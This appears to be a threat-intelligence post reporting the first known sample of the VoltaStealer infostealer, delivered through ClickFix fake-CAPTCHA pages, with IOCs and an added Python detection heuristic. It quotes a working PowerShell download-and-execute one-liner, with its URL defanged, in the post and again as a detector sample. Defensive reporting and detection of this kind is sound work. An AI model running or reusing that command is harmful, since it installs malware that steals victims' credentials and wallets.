👻 VoltaStealer was basically a ghost story. A slick, evasion-obsessed new infostealer hyped by its author on dark web forums, but no one reported seeing one in the wild, until now.
While tracking a ClickFix actor, we pivoted on a known IOC into an open directory holding a very interesting payload. Artifacts and circumstantial evidence point to one suspect: VoltaStealer. We believe this is the first known sample. 🔬
The delivery is textbook verification and fatigue bait: fraudulent sites dressed up as "security checks" and fake CAPTCHAs. Tick the "I'm not a robot" box and the page silently copies a malicious PowerShell one-liner to your clipboard. The ClickFix lure page then instructs victims to open the Windows Run dialog and enter the paste hotkey command, which fetches the malware. No exploit required, just a checkbox and trust. 🤖
What VoltaStealer claims it can do (per its own MaaS sales pitch, surfaced via Axur's dark web monitoring):
🔴 Runs fully in memory — custom encryption/obfuscation, minimal disk artifacts
🔴 Heavy evasion — anti-VM/sandbox/debug, direct syscalls, runtime FUD, ~75% build uniqueness, chunked exfil to stay quiet
🔴 Grabs everything — passwords, cookies, auth tokens, browser + desktop crypto wallets, Telegram sessions, VPN configs, and files via regex scanning
🔴 Fast & greedy — 5–10s execution, ~95% "hit rate" claim, partial upload even if interrupted, no persistence
🔴 Full storefront — web panel + builder, dashboards, API, team roles, clipper/loader/file-grabber modules, tiered subs
In other words: vapor no more. 💨
⛔ VoltaStealer C2:
usevolta[.]su
⛔ VoltaStealer Payloads (SHA256):
2be779fc085dd89cf9e042cbcf32ee6da0cd0e3106e9dca49d52b7a839b1aa8f
253f53b2453f8bff642421cfa5d851af8fc7100409397d80643bd792a7e38edb
⛔ ClickFix PowerShell command (Not VoltaStealer):
command: "powershell -nop -w h -ep bypass -c \"$u='hXXps[:]//plonkert[.]cfd/de372ad5.exe';$f=$env:TEMP+'\\\\x.exe';$w=[Net.WebClient]::new();$w.('Down'+'loadFile')($u,$f);Unblock-File $f -EA 0;ri ($f+':Zone.Identifier') -EA 0;$env:SEE_MASK_NOZONECHECKS=1;& $f"
⛔ Malware payload (Not VoltaStealer) dropped via ClickFix malicious command (SHA256):
6a6f16d7202e64fea38a757b5151a39099124a1bf55ba55e62d58f3ae102f7e8
⛔ ClickFix actor domains:
Rule of thumb: real CAPTCHAs don't ask you to open the Windows Run dialog and paste in a command. If one does, close the page. 🛑
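For defenders, the ClickFix one-liner quoted above has a recognisable shape in process-creation telemetry (Sysmon Event ID 1, Security 4688): a hidden-window PowerShell launch with execution-policy bypass, a .NET web client download whose method name is split into concatenated strings, Mark-of-the-Web removal, and execution of the dropped file from %TEMP%. The following is an added detection heuristic, not code from the post or from Infoblox; the indicator names, the threshold and the benign sample lines are my own assumptions, and the first sample is the post's command with its URL left defanged.

```python
import re

# Heuristic indicators for the ClickFix pattern described in the post. Each one alone is
# common in legitimate admin scripts; the rule only fires when several co-occur.
INDICATORS = {
    "hidden_window":        re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "execpolicy_bypass":    re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I),
    "web_download":         re.compile(r"Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b", re.I),
    "string_concat_method": re.compile(r"\.\(\s*'[^']*'\s*\+\s*'[^']*'\s*\)"),   # e.g. .('Down'+'loadFile')
    "motw_removal":         re.compile(r"Zone\.Identifier|Unblock-File|SEE_MASK_NOZONECHECKS", re.I),
    "temp_drop_and_exec":   re.compile(r"\$env:TEMP.*&\s*\$\w+", re.I),          # drop to %TEMP%, then '& $f'
}
MIN_HITS = 3  # assumed threshold: two hits (hidden + bypass) is everyday admin tooling

# Constructed sample command lines. The first is the ClickFix command from the post
# (URL defanged as in the post); the rest are benign launches for comparison.
SAMPLE_COMMAND_LINES = [
    r'''powershell -nop -w h -ep bypass -c "$u='hXXps[:]//plonkert[.]cfd/de372ad5.exe';$f=$env:TEMP+'\\x.exe';$w=[Net.WebClient]::new();$w.('Down'+'loadFile')($u,$f);Unblock-File $f -EA 0;ri ($f+':Zone.Identifier') -EA 0;$env:SEE_MASK_NOZONECHECKS=1;& $f"''',
    r"powershell.exe -NoProfile -Command Get-ChildItem $env:TEMP",
    r"powershell -w hidden -ep bypass -File C:\scripts\backup.ps1",
    r"C:\Windows\System32\cmd.exe /c dir",
]


def scan_command_line(cmd: str) -> dict:
    """Evaluate one logged command line; return the indicators that fired and the verdict."""
    is_powershell = re.search(r"\b(?:powershell|pwsh)(?:\.exe)?\b", cmd, re.I) is not None
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    return {"suspicious": is_powershell and len(hits) >= MIN_HITS, "indicators": hits}


def scan_log(lines):
    """Run the rule over many command lines; return (line, fired indicators) for each flagged one."""
    flagged = []
    for line in lines:
        result = scan_command_line(line)
        if result["suspicious"]:
            flagged.append((line, result["indicators"]))
    return flagged


if __name__ == "__main__":
    for line, fired in scan_log(SAMPLE_COMMAND_LINES):
        print("FLAGGED:", ", ".join(fired))
        print("   ", line[:80] + ("..." if len(line) > 80 else ""))
```

Only the ClickFix line crosses the threshold (all six indicators fire); the hidden-window backup script scores two and stays below it, which is the point of scoring rather than alerting on any single flag.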
#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #clickfix #infostealer #voltastealer #maas #malware #captcha #axur